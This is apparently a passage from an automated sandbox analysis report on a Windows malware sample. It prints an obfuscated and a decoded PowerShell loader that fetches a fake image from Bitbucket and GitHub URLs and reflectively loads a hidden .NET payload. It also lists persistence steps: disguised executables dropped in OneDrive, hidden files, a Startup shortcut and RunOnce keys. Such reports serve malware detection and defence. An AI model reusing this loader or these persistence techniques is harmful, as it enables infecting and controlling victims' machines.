s$awBr$Gs$awBr$Gs$aw$v$HQ$Z$By$GQ$cgBl$GU$cwB0$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwBp$G0$Zw$u$Go$c$Bn$D8$NQ$z$Dc$Ng$x$DI$Jw$s$C$$JwBo$HQ$d$Bw$HM$Og$v$C8$cgBh$Hc$LgBn$Gk$d$Bo$HU$YgB1$HM$ZQBy$GM$bwBu$HQ$ZQBu$HQ$LgBj$G8$bQ$v$Gc$bQBl$GQ$dQBz$GE$MQ$z$DU$LwBu$GE$bgBv$C8$cgBl$GY$cw$v$Gg$ZQBh$GQ$cw$v$G0$YQBp$G4$LwBu$GU$dwBf$Gk$bQBn$DE$Mg$z$C4$agBw$Gc$Jw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$PQ$g$EQ$bwB3$G4$b$Bv$GE$Z$BE$GE$d$Bh$EY$cgBv$G0$T$Bp$G4$awBz$C$$J$Bs$Gk$bgBr$HM$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$g$C0$bgBl$C$$J$Bu$HU$b$Bs$Ck$I$B7$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$V$Bl$Hg$d$$u$EU$bgBj$G8$Z$Bp$G4$ZwBd$Do$OgBV$FQ$Rg$4$C4$RwBl$HQ$UwB0$HI$aQBu$Gc$K$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$I$$9$C$$Jw$8$Dw$QgBB$FM$RQ$2$DQ$XwBT$FQ$QQBS$FQ$Pg$+$Cc$Ow$g$CQ$ZQBu$GQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$EU$TgBE$D4$Pg$n$Ds$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$9$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$u$Ek$bgBk$GU$e$BP$GY$K$$k$HM$d$Bh$HI$d$BG$Gw$YQBn$Ck$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$ZQBu$GQ$RgBs$GE$Zw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$aQBm$C$$K$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$t$Gc$ZQ$g$D$$I$$t$GE$bgBk$C$$J$Bl$G4$Z$BJ$G4$Z$Bl$Hg$I$$t$Gc$d$$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$p$C$$ew$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$Cs$PQ$g$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$LgBM$GU$bgBn$HQ$a$$7$C$$DQ$K$C
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.knncbbp/sdaolnwod/fwqfwrew/ewqrwfwqf/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Gc$a$Bq$Gs$awBr$Gs$awBr$Gs$aw$v$HQ$Z$By$GQ$cgBl$GU$cwB0$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwBp$G0$Zw$u$Go$c$Bn$D8$NQ$z$Dc$Ng$x$DI$Jw$s$C$$JwBo$HQ$d$Bw$HM$Og$v$C8$cgBh$Hc$LgBn$Gk$d$Bo$HU$YgB1$HM$ZQBy$GM$bwBu$HQ$ZQBu$HQ$LgBj$G8$bQ$v$Gc$bQBl$GQ$dQBz$GE$MQ$z$DU$LwBu$GE$bgBv$C8$cgBl$GY$cw$v$Gg$ZQBh$GQ$cw$v$G0$YQBp$G4$LwBu$GU$dwBf$Gk$bQBn$DE$Mg$z$C4$agBw$Gc$Jw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$PQ$g$EQ$bwB3$G4$b$Bv$GE$Z$BE$GE$d$Bh$EY$cgBv$G0$T$Bp$G4$awBz$C$$J$Bs$Gk$bgBr$HM$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$g$C0$bgBl$C$$J$Bu$HU$b$Bs$Ck$I$B7$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$V$Bl$Hg$d$$u$EU$bgBj$G8$Z$Bp$G4$ZwBd$Do$OgBV$FQ$Rg$4$C4$RwBl$HQ$UwB0$HI$aQBu$Gc$K$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$I$$9$C$$Jw$8$Dw$QgBB$FM$RQ$2$DQ$XwBT$FQ$QQBS$FQ$Pg$+$Cc$Ow$g$CQ$ZQBu$GQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$EU$TgBE$D4$Pg$n$Ds$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$9$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$u$Ek$bgBk$GU$e$BP$GY$K$$k$HM$d$Bh$HI$d$BG$Gw$YQBn$Ck$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$ZQBu$GQ$RgBs$GE$Zw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$aQBm$C$$K$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$t$Gc$ZQ$g$D$$I$$t$GE$bgBk$C$$J$Bl$G4$Z$BJ$G4$Z$Bl$Hg$I$$t$Gc$d$$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$p$C$$ew$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$Cs$PQ$g$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$LgBM$GU$bgBn$HQ$a$$7$C$$DQ$K$CJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.knncbbp/sdaolnwod/fwqfwrew/ewqrwfwqf/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -execJump to behavior
                  Source: 3lhrJ4X.exeStatic PE information: 0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeCode function: 0_2_00007FF761F71D28 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00007FF761F71D28
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_012E8D8A pushad ; ret 8_2_012E8D99

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: attrib.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: attrib.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: attrib.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: attrib.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: attrib.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: attrib.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: attrib.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: attrib.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: attrib.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: attrib.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: attrib.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: attrib.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: attrib.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: attrib.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: attrib.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: attrib.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: attrib.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: attrib.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: attrib.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: attrib.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: attrib.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: attrib.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: attrib.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: attrib.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: attrib.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: attrib.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\OneDrive\windows portable devices.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\OneDrive\msbuild.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\OneDrive\windowspowershell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\OneDrive\ifwthxgyzzxlnqytikopviejxuuiqxxdjtxycgnjituknbjfd.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\OneDrive\windows multimedia platform.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\OneDrive\windows sidebar.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\OneDrive\autoit3.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\OneDrive\microsoft.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\OneDrive\windows photo viewer.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\OneDrive\microsoft office.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\OneDrive\microsoft.net.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\OneDrive\java.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\OneDrive\google.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\OneDrive\microsoft onedrive.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\OneDrive\windows nt.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\OneDrive\common files.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\OneDrive\windows defender.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\OneDrive\internet explorer.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\OneDrive\windows mail.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\OneDrive\msecache.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\OneDrive\windows media player.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\OneDrive\reference assemblies.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\OneDrive\jdownloader.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\OneDrive\mozilla maintenance service.exeJump to dropped file
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeCode function: 0_2_00007FF761F71684 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00007FF761F71684

                  Boot Survival

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /Query /TN "Msbuild"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Msbuild.lnkJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Msbuild.lnkJump to behavior
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
